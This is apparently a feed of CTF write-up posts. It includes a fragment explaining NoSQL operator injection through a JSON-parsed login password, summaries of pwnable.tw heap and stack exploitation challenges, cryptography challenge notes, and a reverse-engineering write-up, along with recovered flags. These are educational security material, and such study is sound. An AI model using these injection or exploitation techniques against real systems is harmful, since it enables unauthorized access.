style="color:#a6e22e">email</span>) </span></span><span style="display:flex;"><span> <span style="color:#f92672">:</span> <span style="color:#a6e22e">email</span>, </span></span><span style="display:flex;"><span><span style="color:#a6e22e">password</span><span style="color:#f92672">:</span> </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">password</span>.<span style="color:#a6e22e">startsWith</span>(<span style="color:#e6db74">&#34;{&#34;</span>) <span style="color:#f92672">&amp;&amp;</span> <span style="color:#a6e22e">password</span>.<span style="color:#a6e22e">endsWith</span>(<span style="color:#e6db74">&#34;}&#34;</span>) </span></span><span style="display:flex;"><span> <span style="color:#f92672">?</span> <span style="color:#a6e22e">JSON</span>.<span style="color:#a6e22e">parse</span>(<span style="color:#a6e22e">password</span>) </span></span><span style="display:flex;"><span> <span style="color:#f92672">:</span> <span style="color:#a6e22e">password</span>, </span></span></code></pre></div><p>Then it performs:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-js" data-lang="js"><span style="display:flex;"><span><span style="color:#a6e22e">User</span>.<span style="color:#a6e22e">findOne</span>({ <span style="color:#a6e22e">email</span><span style="color:#f92672">:</span> <span style="color:#f92672">&lt;</span><span style="color:#a6e22e">parsed</span><span style="color:#f92672">&gt;</span>, <span style="color:#a6e22e">password</span><span style="color:#f92672">:</span> <span style="color:#f92672">&lt;</span><span style="color:#a6e22e">parsed</span><span style="color:#f92672">&gt;</span> }) </span></span></code></pre></div><p>So if we send JSON object strings, they become Mongo operators instead of plain strings.</p> /posts/0x3-learn-ctf-pwn/ Tue, 24 Feb 2026 04:10:00 +0700 /posts/0x3-learn-ctf-pwn/ <h2 id="table-of-contents">Table of Contents</h2> <ul> <li><a href="#secret-garden--fastbin-dup--__malloc_hook-overwrite-glibc-223">Secret Garden — fastbin dup + <code>__malloc_hook</code> overwrite (glibc 2.23)</a></li> <li><a href="#kidding--stack-overflow--_dl_make_stack_executable-route">Kidding — stack overflow + <code>_dl_make_stack_executable</code> route</a></li> <li><a href="#start--stack-bof-leak--stack-shellcode">Start — stack BOF leak + stack shellcode</a></li> </ul> <hr> <h2 id="secret-garden--fastbin-dup--__malloc_hook-overwrite-glibc-223">Secret Garden — fastbin dup + <code>__malloc_hook</code> overwrite (glibc 2.23)</h2> <h3 id="summary">Summary</h3> <ul> <li><strong>Category:</strong> Pwn / Heap Exploitation</li> <li><strong>Challenge:</strong> <code>pwnable.tw - secretgarden</code></li> <li><strong>Binary:</strong> <code>secretgarden</code></li> <li><strong>Libc:</strong> <code>libc_64.so.6</code> (Ubuntu GLIBC 2.23)</li> <li><strong>Protections:</strong> RELRO + Canary + NX + PIE</li> <li><strong>Flag:</strong></li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>FLAG{FastBiN_C0rruption_t0_BUrN_7H3_G4rd3n} </span></span></code></pre></div><h3 id="bug-and-primitive">Bug and primitive</h3> <p>The program stores flower objects in a global array. Each flower has a heap-allocated <code>name</code> pointer.</p> /posts/0x2-learn-ctf-cryptography/ Mon, 23 Feb 2026 23:40:00 +0700 /posts/0x2-learn-ctf-cryptography/ <h2 id="table-of-contents">Table of Contents</h2> <ul> <li><a href="#error-code--merkle-hellman-implementation-bug">error-code — Merkle-Hellman implementation bug</a></li> <li><a href="#nito--truncated-state-recovery-with-coppersmith">nito — truncated-state recovery with Coppersmith</a></li> <li><a href="#lack-of-entropy--deterministic-rsa-prime-relation">Lack of Entropy — deterministic RSA prime relation</a></li> <li><a href="#a-joke-cipher--broken-key-exchange-leaks-plaintext-multiplier">a-joke-cipher — broken key exchange leaks plaintext multiplier</a></li> <li><a href="#d-phi-enc--recovering-rsa-factors-from-encrypted-%CF%86-and-d">d-phi-enc — recovering RSA factors from encrypted φ and d</a></li> </ul> <hr> <h2 id="error-code--merkle-hellman-implementation-bug">error-code — Merkle-Hellman implementation bug</h2> <h3 id="summary">Summary</h3> <ul> <li><strong>Category:</strong> Cryptography</li> <li><strong>Challenge:</strong> <code>error-code</code></li> <li><strong>Core scheme:</strong> Merkle-Hellman knapsack (subset-sum)</li> <li><strong>Given files:</strong> <code>chall.py</code>, <code>output</code></li> <li><strong>Recovered flag:</strong></li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>CBC{4_cl4ss1c_subs3t_sum_pr0blem_r1ght_9c209955} </span></span></code></pre></div><h3 id="problem-statement-practical">Problem statement (practical)</h3> <p>The challenge author says they implemented Merkle-Hellman, but decryption does not work. The job is to identify the implementation error and recover the plaintext.</p> /posts/0x1-learn-ctf-reverse-engineering/ Mon, 23 Feb 2026 15:30:00 +0700 /posts/0x1-learn-ctf-reverse-engineering/ <h2 id="table-of-contents">Table of Contents</h2> <ul> <li><a href="#re-010--network-byte-transform-checker">re-010 — Network byte-transform checker</a></li> <li><a href="#re-012--constraint-based-checker-f1f8">re-012 — Constraint-based checker (f1..f8)</a></li> <li><a href="#carbonara--jump-obfuscation-and-data-flow-recovery">Carbonara — jump-obfuscation and data-flow recovery</a></li> </ul> <hr> <h2 id="re-010--network-byte-transform-checker">re-010 — Network byte-transform checker</h2> <h3 id="summary">Summary</h3> <ul> <li><strong>Type:</strong> Reversing (ELF64, stripped, PIE)</li> <li><strong>Behavior:</strong> TCP server flag checker</li> <li><strong>Port:</strong> <code>31338</code></li> <li><strong>Expected input length:</strong> <code>37</code> bytes</li> <li><strong>Result:</strong> <code>:)</code> on success, <code>:(</code> on failure</li> <li><strong>Flag:</strong> <code>CBC{c72b6b1feb2dbb3132380e1a9f967441}</code></li> </ul> <h3 id="notes">Notes</h3> <ul> <li>The binary does not read from stdin directly; it binds/listens and validates client input over a socket.</li> <li>Validation is split into 3 blocks of 16 transformed-byte checks using constant tables in <code>.rodata</code>.</li> <li>Recovered plaintext chunks: <ul> <li><code>CBC{c72b6b1feb2d</code></li> <li><code>bb3132380e1a9f96</code></li> <li><code>7441}</code></li> </ul> </li> <li>Combined final flag:</li> </ul> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>CBC{c72b6b1feb2dbb3132380e1a9f967441} </span></span></code></pre></div><h3 id="validation">Validation</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># run service</span> </span></span><span style="display:flex;"><span>./chall </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># in another shell</span> </span></span><span style="display:flex;"><span>python3 - <span style="color:#e6db74">&lt;&lt; &#39;PY&#39; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">import socket </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">flag=&#39;CBC{c72b6b1feb2dbb3132380e1a9f967441}&#39; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">s=socket.create_connection((&#39;127.0.0.1&#39;,31338)) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">print(s.recv(200)) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">s.sendall(flag.encode()+b&#39;\n&#39;) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">print(s.recv(200)) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">PY</span> </span></span></code></pre></div><p>Expected response contains <code>:)</code>.</p>